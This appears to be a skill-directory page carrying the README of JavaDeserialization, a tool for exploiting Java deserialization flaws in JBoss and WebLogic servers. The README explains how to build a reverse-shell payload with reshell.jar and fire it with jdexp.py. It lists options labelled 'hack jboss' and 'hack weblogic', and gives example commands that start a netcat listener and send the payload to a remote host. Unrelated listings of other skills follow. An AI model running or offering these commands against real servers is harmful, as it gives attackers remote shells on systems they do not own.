JavaDeserialization

All in one

Generate Convert Improve

Install / Use

/learn @hackzx/JavaDeserialization

About this skill

Quality Score

0/100

README

JavaDeserialization

用reshell.jar生成反弹shell的payload，然后jdexp.py执行。

▶ java -jar reshell.jar
usage: reshell.jar host port path

……

positional arguments:
  host        reverse domain/IP
  port        reverse port
  path        generate payload file path

  
  
▶ python jdexp.py -h
usage: jdexp.py [-h] [-jboss] [-weblogic] host port payload

……

positional arguments:
  host        remote domain/IP
  port        remote port
  payload     local payload file

optional arguments:
  -h, --help  show this help message and exit
  -jboss      hack jboss
  -weblogic   hack weblogic

……

Example:

▶ nc -vvlp 888
▶ cp shell.jar /var/www/
▶ java -jar reshell.jar [ReverseIP] 888 /tmp/payload
▶ python jdexp.py -weblogic [RemoteIP] 7001 /tmp/payload
▶ python jdexp.py -jboss [RemoteIP] 80 /tmp/payload

Related Skills

node-connect

344.1k

Diagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps

frontend-design

96.8k

Create distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.

openai-whisper-api

344.1k

Transcribe audio via OpenAI Audio Transcriptions API (Whisper).

qqbot-media

344.1k

QQBot 富媒体收发能力。使用 <qqmedia> 标签，系统根据文件扩展名自动识别类型（图片/语音/视频/文件）。